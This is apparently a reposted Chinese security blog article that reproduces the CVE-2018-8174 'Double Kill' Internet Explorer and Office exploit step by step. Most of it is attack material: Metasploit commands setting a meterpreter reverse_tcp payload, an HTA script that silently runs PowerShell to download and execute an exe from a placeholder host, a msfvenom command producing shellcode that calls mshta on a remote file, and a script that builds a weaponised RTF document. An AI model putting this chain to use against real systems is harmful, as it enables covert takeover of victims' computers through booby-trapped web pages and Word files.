CVE-2018-8174 “双杀”0day漏洞复现

最近360核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用0day漏洞的APT攻击,捕获到了全球首例利用浏览器0day漏洞的新型Office文档攻击,我们将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。

POC验证

未打补丁系统,IE浏览器打开此地址会弹出计算器 。阅读原文下载POC。

metasploit 复现

下载 metasploit 模块到本地

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

将CVE-2018-8174.rb复制到 fileformat 目录

cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

将CVE-2018-8174.rtf复制到 exploits 目录

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

启动 metasploit

use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.0.116
set lhost 192.168.0.116
exploit

复制 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开 或者IE浏览器打开 http://192.168.0.116:8080 即可获得会话

自定义下载者 复现

利用 mshta 从远程服务器下载文件执行。

请先下载poc附件。

1.构造HTA文件,当访问hta文件就会触发powershell下载文件至临时目录执行

准备你的xx.exe文件上传至站点目录,假如得到地址 http://xxx.com/xxx.exe

HTA代码:

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://xxx.com/xxx.exe\', \'c:/windows/temp/xxx.exe\'); c:/windows/temp/xxx.exe', 0);window.close();
</script>

把该文件命名 8174.hta 上传至站点目录;假如得到地址 http://xxx.lr3800.com/8174.hta

2.使用msfvenom生成 js Shellcode

msfvenom -p windows/exec cmd='mshta http://xxx.lr3800.com/8174.hta' -f js_le exitfunc=thread -a x86

把生成的Shellcode字符替换至 8174poc.html 166行代码

把 8174poc.html 文件上传至站点目录 假如得到地址 http://xxx.lr3800.com/8174poc.html

3.生成Word文档

  • 下载python脚本保存本地
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

运行 CVE-2018-8174.py

python CVE-2018-8174.py -u http://xxx.lr3800.com/8174poc.html -o exp.rtf

得到目录中的 “exp.rtf ”文件,使用Word文档打开即可下载执行xx.exe文件,或者IE浏览器打开 http://xxx.lr3800.com/8174poc.html 即可下载执行xx.exe文件

样本演示运行效果 https://app.any.run/tasks/3c52b2b2-3fb7-42ff-a3bf-14429b17b112

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2018-06-09

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏散尽浮华

ping监控脚本案例分析

2153
来自专栏Linyb极客之路

工作流引擎之activiti中的排他网关和并行网关

排他网关.png

2251
来自专栏网络

HTTP页面如何完成301重定向

上周,本站发布了一篇名为《站长须知:HTTP迁移HTTPS时,如何避免发生重复内容问题》的文章。介绍了HTTP页面迁移到HTTPS的时候,为了避免出现重复内容的...

4695
来自专栏农夫安全

查找代理工具

查找代理工具:ProxyBroker https://github.com/constverum/ProxyBroker.git 为了解决大家查找代理的问题,介...

2516
来自专栏安恒信息

紧急预警 | 大量Windows 0-day漏洞泄漏,全球70%以上Windows服务器可被远程控制

北京时间 2017 年 4 月 14 日晚,黑客团体Shadow Brokers (影子经纪人)再次泄露了一份 117.9 MB 的 NSA 机密文档,内含 2...

2614
来自专栏Jerry的SAP技术分享

Internationalization(i18n) support in SAP CRM,UI5 and Hybris

i18n(其来源是英文单词 internationalization的首末字符i和n,18为中间的字符数)是“国际化”的简称。对程序来说,在不修改内部代码的情况...

3504
来自专栏流柯技术学院

关于linux下DB2创建数据库报错问题

公司业务需要,把服务搭在中标下,在中标下装了DB2 Express-C v9.7.1,之前用着没有问题,隔了一段时间没用,最近又需要用到它,出了一些菜鸟问题,记...

1131
来自专栏linux驱动个人学习

linux内核完全剖析——基于0.12内核-笔记(2)-统一编址和独立编址

IO是什么 ? IO(Input and Output)是输入输出接口。是CPU和其他外部设备(如串口、LCD、触摸屏、LED等)之间通信的接口。一般的,我们说...

3776
来自专栏WD学习记录

ASP.NET MVC4 配置逻辑

902
来自专栏嵌入式程序猿

SAE J1939 协议简介(大结局)

由于应用层会根据不同的行业和需求有所不同,所以应用层的开发可以参考标准自行研究,关于这个系列,今天是最后一集,我们来讲讲 J1939的网络管理层(J1939/8...

3748

扫码关注云+社区

领取腾讯云代金券